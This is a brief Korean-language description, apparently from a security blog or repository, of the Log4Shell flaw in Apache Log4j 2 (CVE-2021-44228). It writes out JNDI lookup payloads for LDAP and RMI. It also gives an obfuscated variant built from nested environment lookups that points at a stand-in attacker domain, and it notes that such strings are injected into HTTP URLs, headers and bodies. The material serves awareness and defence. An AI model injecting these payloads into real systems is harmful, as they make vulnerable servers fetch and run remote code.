Apache Log4j 2 취약점 (CVE-2021-44228 / Log4Shell) PoC 및 취약점 스캐너 * 공격 구문 형식 - 주요 공격구문 : ${jndi:ldap://xxx.xxx.xxx/z} , ${jndi:rmi://xxx.xxx.xxx/z} - HTTP URL, Header, body에 삽입하여 다수 공격 시도 (Zgrab과 같은 취약점 스캐너를 이동한 자동화 공격) - 대소문자 및 아래와 같은 변형된 형식으로 인입도 가능. ex) ${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//somesitehackerofhell.com/z} - 출처 : https://github.com/Puliczek/..